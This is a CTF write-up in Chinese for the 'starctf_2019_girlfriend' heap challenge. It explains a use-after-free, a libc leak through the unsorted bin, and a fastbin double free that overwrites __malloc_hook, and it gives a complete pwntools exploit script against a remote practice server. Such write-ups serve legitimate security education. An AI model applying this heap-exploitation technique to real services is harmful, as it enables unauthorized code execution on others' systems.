Starctf_2019_girlfriend
<p>[TOC]</p>
<h1>分析</h1>
<p><img src="https://pic.imgdb.cn/item/63ad9faf08b683016307daba.png" alt="" /> </p>
<p>唯一的漏洞就是name的chunk存在UAF,但是输入只有add里面才可以</p>
<p><img src="https://pic.imgdb.cn/item/63ad9ff608b6830163089618.png" alt="" /> </p>
<p>可以很容易分析出结构为一个girl friend申请一个0x18的chunk,前8个字节用于存储name的chunk指针,中间4个字节存储name的size,最后0xC字节输入call,由于name的size不限定,所以可以申请一个unsortedbin chunk释放后UAF泄露libc地址,再double free攻击 <code>__malloc_hook</code> ,可能需要用到 <code>__libc_realloc</code> </p>
<h1>Exploit</h1>
<pre><code>from pwn import*
# context.log_level = 'debug'
# o = process('./pwn')
o = remote('node4.buuoj.cn', '27825')
libc = ELF('./libc-2.23.so')
def add(size, name, call):
o.sendlineafter('Input your choice:', '1')
o.sendlineafter("Please input the size of girl's name", str(size))
o.sendlineafter('please inpute her name:', name)
o.sendlineafter('please input her call:', call)
def show(index):
o.sendlineafter('Input your choice:', '2')
o.sendlineafter('Please input the index:', str(index))
def call(index):
o.sendlineafter('Input your choice:', '4')
o.sendlineafter('Please input the index:', str(index))
add(0x90, 'aaaa', '11111') # 0
add(0x60, 'bbbb', '22222') # 1
call(0)
show(0)
o.recvuntil('name:\n')
malloc_hook = u64(o.recv(6)+"\x00\x00") - 0x68
log.info(hex(malloc_hook))
libc_base = malloc_hook - libc.sym['__malloc_hook']
log.info("libc_base: %x", libc_base)
libc_realloc = libc_base + libc.sym['__libc_realloc']
one = libc_base + 0xf1147
add(0x70, 'cccc', '123') # 2
add(0x60, 'cccc', '33333') # 3
call(1)
call(3)
call(1)
add(0x60, p64(malloc_hook-0x23), '123')
add(0x60, 'aaaa', '123')
add(0x60, 'aaaa', '123')
add(0x60, 'a'*11+p64(one)+p64(libc_realloc+2), '123')
o.sendlineafter('Input your choice:', '1')
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63ada0e208b68301630b0a2f.png" alt="" /></p>